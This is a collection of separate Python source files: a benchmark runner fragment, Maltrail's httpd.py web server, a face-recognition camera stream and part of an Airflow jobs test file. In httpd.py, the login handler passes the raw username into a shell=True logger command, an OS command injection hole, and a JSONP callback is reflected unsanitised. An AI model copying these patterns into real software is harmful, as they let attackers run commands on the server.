print("{} qps={:.2f}, mean={:.6f}, time={:.2f}, acc={:.2f}, tiles={}".format(
name, result["qps"], result["mean"], took, result["accuracy"], buckets_str))
def main():
args = get_args()
print(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# dataset to use
wanted_dataset, preprocessor, postprocessor, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=preprocessor,
use_cache=args.cache,
count=args.count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
#
# make one pass over the dataset to validate accuracy
#
count = args.count if args.count else ds.get_item_count()
runner = Runner(model, ds, args.threads, post_process=postprocessor)
runner.start_pool()
# warmup
log.info("warmup ...")
ds.load_query_samples([0])
for _ in range(100):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
def issue_query(query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
data, label = ds.get_samples(idx)
runner.enqueue(query_id, data, label)
sut = lg.ConstructSUT(issue_query)
qsl = lg.ConstructQSL(count, args.time, ds.load_query_samples, ds.unload_query_samples)
scenarios = [
# lg.TestScenario.SingleStream,
lg.TestScenario.MultiStream,
# lg.TestScenario.Cloud,
# lg.TestScenario.Offline,
]
for scenario in scenarios:
for target_latency in args.max_latency:
log.info("starting {}, latency={}".format(scenario, target_latency))
settings = lg.TestSettings()
settings.scenario = scenario
settings.mode = lg.TestMode.SubmissionRun
settings.samples_per_query = 4 # FIXME: we don't want to know about this
settings.target_qps = 1000 # FIXME: we don't want to know about this
settings.target_latency_ns = int(target_latency * 1000000000)
result_list = []
result_dict = {"good": 0, "total": 0}
runner.start_run(result_list, result_dict)
start = time.time()
lg.StartTest(sut, qsl, settings)
add_results(final_results, "{}-{}".format(scenario, target_latency),
result_dict, result_list, time.time() - start)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open(args.output, "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
httpd.py | #!/usr/bin/env python
"""
Copyright (c) 2014-2017 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.SET_COOKIE, "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))))
if netfilter in ("", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
try:
if pem:
server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
else:
server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
camera_opencv.py | import os
import cv2
from base_camera import BaseCamera
import face_recognition
import numpy as np
import glob
import time
import threading
from os.path import basename, splitext
from base64 import b64decode, b64encode
class Camera(BaseCamera):
video_source = "0"
known_face_encodings = []
known_face_names = []
def __init__(self):
if os.environ.get('OPENCV_CAMERA_SOURCE'):
Camera.set_video_source(os.environ['OPENCV_CAMERA_SOURCE'])
th2 = threading.Thread(target=Camera.reload_images)
th2.setDaemon(True)
th2.start()
super(Camera, self).__init__()
@staticmethod
def set_video_source(source):
Camera.video_source = source
@staticmethod
def get_image_encode_string(filename):
with open(filename, "rb") as image:
return b64encode(image.read())
@staticmethod
def reload_images():
global known_face_encodings
global known_face_names
while (True):
known_face_encodings_tmp = []
known_face_names_tmp = []
filefullnames = [filefullname for filefullname in glob.glob("./images/*.jpg", recursive=False)]
for filefullname in filefullnames:
image = face_recognition.load_image_file(filefullname)
face_encoding = face_recognition.face_encodings(image)[0]
known_face_encodings_tmp.append(face_encoding)
known_face_names_tmp.append(splitext(basename(filefullname))[0])
Camera.known_face_encodings = known_face_encodings_tmp.copy()
Camera.known_face_names = known_face_names_tmp.copy()
print(Camera.known_face_names)
time.sleep(10)
@staticmethod
def frames():
camera = cv2.VideoCapture(Camera.video_source)
if not camera.isOpened():
print('Could not start camera.')
return
known_face_encodings_tmp = []
known_face_names_tmp = []
filefullnames = [filefullname for filefullname in glob.glob("./images/*.jpg", recursive=False)]
for filefullname in filefullnames:
image = face_recognition.load_image_file(filefullname)
face_encoding = face_recognition.face_encodings(image)[0]
known_face_encodings_tmp.append(face_encoding)
known_face_names_tmp.append(splitext(basename(filefullname))[0])
Camera.known_face_encodings = known_face_encodings_tmp.copy()
Camera.known_face_names = known_face_names_tmp.copy()
print(Camera.known_face_names)
# Initialize some variables
process_this_frame = True
while True:
# Grab a single frame of video
ret, frame = camera.read()
if not ret:
print("Could not read camera.")
time.sleep(3)
continue
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(Camera.known_face_encodings, face_encoding)
name = "Unknown"
# # If a match was found in known_face_encodings, just use the first one.
# if True in matches:
# first_match_index = matches.index(True)
# name = known_face_names[first_match_index]
# Or instead, use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(Camera.known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = Camera.known_face_names[best_match_index]
face_names.append(name)
process_this_frame = not process_this_frame
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# encode as a jpeg image and return it
yield cv2.imencode('.jpg', frame)[1].tobytes()
|
jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
import sqlalchemy
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from xTool.utils import timezone
from xTool.utils.dates import days_ago
from xTool.decorators.db import provide_session
from xTool.utils.state import State
from xTool.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag
from xTool.utils.file import list_py_file_paths
from airflow.exceptions import AirflowConfigException
from airflow import configuration as conf
from xTool.utils.net import get_hostname
from xTool.exceptions import XToolConfigException, XToolException
from mock import Mock, patch, MagicMock, PropertyMock
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEquals(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
'example_kubernetes_executor', # requires kubernetes cluster
'example_kubernetes_operator' # requires kubernetes cluster
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
